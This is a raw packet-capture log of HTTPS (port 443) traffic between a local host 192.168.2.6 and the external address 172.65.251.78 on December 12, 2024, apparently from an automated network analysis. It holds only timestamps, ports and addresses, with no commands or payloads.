Dec 12, 2024 13:05:18.385943890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.385983944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.386039019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.386046886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.386080027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.386106968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.393604994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.393630028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.393748045 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.393757105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.393801928 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.403651953 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.403672934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.403759956 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.403767109 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.403811932 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.410592079 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.410613060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.410715103 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.410722017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.410952091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.417511940 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.417535067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.417618990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.417628050 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.418083906 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.423881054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.423897028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.423995018 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.424004078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.424050093 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.563626051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.563652992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.563759089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.563796043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.564526081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.570384026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.570400953 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.570472002 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.570482016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.570955992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.578072071 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.578094959 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.578176975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.578188896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.578440905 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.585752964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.585773945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.585846901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.585858107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.586577892 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.593421936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.593439102 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.593513966 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.593523979 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.594021082 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.600732088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.600748062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.600822926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.600831985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.601270914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.607338905 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.607356071 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.607440948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.607450962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.607886076 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.615044117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.615081072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.615171909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.615181923 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.616334915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.757564068 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.757590055 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.757659912 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.757695913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.757734060 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.764369011 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.764390945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.764461994 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.764491081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.764548063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.764556885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.771812916 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.771833897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.771970987 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.772001028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.772073030 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.779557943 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.779581070 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.779629946 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.779664040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.779684067 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.779716969 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.787378073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.787398100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.787481070 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.787492037 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.787601948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.794287920 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.794310093 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.794378996 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.794387102 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.794414043 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.794434071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.801459074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.801479101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.801541090 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.801549911 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.801827908 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.808656931 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.808696985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.808753967 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.808763027 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.808810949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.808810949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.948002100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.948028088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.948096037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.948132038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.948148012 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.948249102 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.955354929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.955379009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.955420017 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.955430031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.955461025 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.955476999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.962088108 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.962110043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.962162971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.962172031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.962203979 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.962224007 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.969727039 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.969753027 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.969832897 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.969844103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.969984055 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.977560043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.977582932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.977638960 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.977658987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.977677107 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.977691889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.984812021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.984842062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.984891891 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.984900951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.984930992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.984944105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.992425919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.992463112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.992564917 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.992574930 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.992588997 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.992683887 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.999120951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.999146938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.999212027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.999229908 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.999331951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.139617920 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.139645100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.139703035 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.139740944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.139760017 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.139789104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.146822929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.146857977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.146933079 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.146941900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.147027016 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.154474974 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.154506922 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.154551983 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.154560089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.154583931 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.154606104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.162178040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.162213087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.162251949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.162266970 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.162286043 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.162300110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.168850899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.168875933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.168937922 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.168945074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.168966055 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.168983936 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.177042961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.177067041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.177124023 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.177134037 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.177175999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.177438021 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.183821917 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.183856010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.183898926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.183916092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.183937073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.183954000 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.191632032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.191668034 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.191706896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.191715002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.191740036 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.191761971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.331696033 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.331731081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.331773996 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.331790924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.331844091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.354762077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.354808092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.354871988 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.354887009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.354944944 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.355446100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.355468988 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.355638027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.355643988 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.355675936 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.355698109 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.355952024 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.355976105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.356036901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.356040955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.356090069 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.356120110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.363030910 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.363053083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.363095999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.363101006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.363157034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.368699074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.368721962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.368769884 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.368773937 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.368820906 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.376391888 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.376411915 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.376470089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.376475096 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.376503944 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.376538992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.384426117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.384447098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.384551048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.384557962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.384607077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.523793936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.523839951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.523905993 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.523922920 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.523947001 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.523966074 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.531430960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.531465054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.531537056 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.531550884 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.531584978 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.531608105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.538125992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.538182020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.538233042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.538248062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.538285971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.538300037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.545855999 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.545901060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.545952082 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.545967102 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.546008110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.546021938 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.553541899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.553591013 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.553621054 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.553638935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.553674936 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.553695917 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.560755968 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.560785055 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.560834885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.560847044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.560889959 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.568474054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.568528891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.568569899 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.568583965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.568614006 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.568633080 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.575334072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.575378895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.575411081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.575424910 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.575463057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.716003895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.716092110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.716105938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.716115952 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.716171026 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.723480940 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.723507881 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.723591089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.723603010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.723650932 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.731467962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.731486082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.731563091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.731568098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.731621027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.737972021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.737989902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.738082886 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.738089085 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.738128901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.745536089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.745554924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.745682955 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.745690107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.745733976 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.753283978 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.753309965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.753417969 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.753427982 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.753480911 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.760456085 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.760477066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.760642052 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.760651112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.760698080 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.768445015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.768465042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.768510103 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.768515110 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.768573046 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.911515951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.911556005 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.911674023 CET	49726	443	192.168.2.6	172.65.251.78
